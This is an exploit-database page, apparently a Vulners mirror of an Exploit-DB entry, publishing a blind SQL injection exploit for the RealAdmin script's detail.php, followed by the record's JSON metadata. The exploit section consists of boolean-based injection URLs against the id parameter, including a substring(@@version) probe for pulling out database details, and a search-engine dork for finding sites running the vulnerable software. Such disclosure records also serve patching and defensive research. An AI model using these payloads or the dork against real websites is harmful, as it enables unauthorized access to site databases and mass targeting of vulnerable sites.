Search...

RealAdmin detail.php Blind SQL Injection Vulnerability

2010-02-03T00:00:00

ID EDB-ID:11325
Type exploitdb
Reporter AtT4CKxT3rR0r1ST
Modified 2010-02-03T00:00:00

Description

RealAdmin (detail.php) Blind Sql Injection Vulnerability. Webapps exploit for php platform

                                        
                                            RealAdmin (detail.php) Blind Sql Injection Vulnerability
========================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Team           : Sec Attack Team
.:. Home           : www.sec-attack.com/vb
.:. Script         : RealAdmin
.:. Download Script: http://www.redcow.ca/products/realadmin/
.:. Bug Type       : Blind Sql Injection
.:. Dork           : "Powered by RealAdmin and Red Cow Technologies, Inc."

####################################################################

===[ Exploit ]===

www.site.com/detail.php?id=[Blind SQL INJECTION]


www.site.com/detail.php?id=NULL+and+1=1       &gt;&gt;&gt; True
www.site.com/detail.php?id=NULL+and+1=2       &gt;&gt;&gt; False


www.site.com/detail.php?id=NULL+and+substring(@@version,1,1)=5  &gt;&gt;&gt; True
www.site.com/detail.php?id=NULL+and+substring(@@version,1,1)=4  &gt;&gt;&gt; False


####################################################################

Greats T0: HackxBack & Zero Cold & All My Friend & All Member Sec Attack

JSON Vulners Source

Initial Source

{"id": "EDB-ID:11325", "type": "exploitdb", "bulletinFamily": "exploit", "title": "RealAdmin detail.php Blind SQL Injection Vulnerability", "description": "RealAdmin (detail.php) Blind Sql Injection Vulnerability. Webapps exploit for php platform", "published": "2010-02-03T00:00:00", "modified": "2010-02-03T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/11325/", "reporter": "AtT4CKxT3rR0r1ST ", "references": [], "cvelist": [], "lastseen": "2016-02-01T14:05:22", "viewCount": 9, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2016-02-01T14:05:22", "rev": 2}, "dependencies": {"references": [], "modified": "2016-02-01T14:05:22", "rev": 2}, "vulnersScore": 0.2}, "sourceHref": "https://www.exploit-db.com/download/11325/", "sourceData": "RealAdmin (detail.php) Blind Sql Injection Vulnerability\r\n========================================================\r\n\r\n####################################################################\r\n.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]\r\n.:. Team : Sec Attack Team\r\n.:. Home : www.sec-attack.com/vb\r\n.:. Script : RealAdmin\r\n.:. Download Script: http://www.redcow.ca/products/realadmin/\r\n.:. Bug Type : Blind Sql Injection\r\n.:. Dork : \"Powered by RealAdmin and Red Cow Technologies, Inc.\"\r\n\r\n####################################################################\r\n\r\n===[ Exploit ]===\r\n\r\nwww.site.com/detail.php?id=[Blind SQL INJECTION]\r\n\r\n\r\nwww.site.com/detail.php?id=NULL+and+1=1 >>> True\r\nwww.site.com/detail.php?id=NULL+and+1=2 >>> False\r\n\r\n\r\nwww.site.com/detail.php?id=NULL+and+substring(@@version,1,1)=5 >>> True\r\nwww.site.com/detail.php?id=NULL+and+substring(@@version,1,1)=4 >>> False\r\n\r\n\r\n####################################################################\r\n\r\nGreats T0: HackxBack & Zero Cold & All My Friend & All Member Sec Attack", "osvdbidlist": []}